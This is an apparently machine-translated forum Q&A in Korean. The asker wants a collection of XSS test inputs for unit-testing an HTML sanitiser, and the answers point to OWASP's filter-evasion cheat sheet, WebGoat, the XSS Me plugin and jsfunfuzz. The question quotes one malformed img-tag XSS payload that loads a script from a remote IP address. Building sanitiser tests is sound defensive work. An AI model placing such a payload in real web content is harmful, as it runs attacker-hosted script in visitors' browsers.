XSS 고문 테스트 - 존재합니까?

Question

html sanitiser를 쓰고 싶습니다. 분명히 제대로 작동하는지 테스트하고/입증해야합니다. XSS 예제 세트를 통해 성능을 확인해야합니다. 여기에 내가 마임 디코더를 테스트하는 데 사용되는 첨부 파일이있는 여러 중첩 된 이메일 포함하는 Mime Torture Test 거기 알고있는 nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>" 

입니다 (그들은 그것을 제대로 해독 할 수 있다면, 그들은 일을 입증했습니다). 저는 기본적으로 XSS에 대한 평범함을 찾고 있습니다. 즉, saniformer에 던져서 제대로 작동하는지 확인할 수있는 dodgy html의 예 목록입니다.

누구나 sanitiser를 작성하는 방법에 대한 훌륭한 자료 (즉, 사람들이 공통적으로 사용하려고하는 악용 사례 등)도 있으면 감사를 표합니다. 사전에

감사

편집 :-) :이 전에 명확하지 않았다,하지만 브라우저에서 테스트되지는 sanitiser에 대한 단위 테스트를 작성할 수 있도록 내가 고문 일련의 테스트 후 있었다면 죄송합니다 이론적으로 소스 데이터는 브라우저가 아닌 어디서나 올 수 있습니다.

Answer 1

이 XSS 치트 목록에서보세요 : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me 당신이 당신의 소독제에 대해 실행할 수있는 좋은 파이어 폭스 플러그인입니다.

Answer 3

체크 아웃 OWASP. XSS가 작동하는 방식, 찾을 대상 및 심지어 취약한 사이트에서 손을 댈 수있는 WebGoat 프로젝트에 대한 유용한 지침을 제공합니다.

Answer 4

Jesse Ruderman의 jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/)에서 Javascript에서 임의의 데이터를 삭제하려고 시도해 볼 수 있습니다. 파이어 폭스 팀은 이것을 큰 성공을 거두었 다.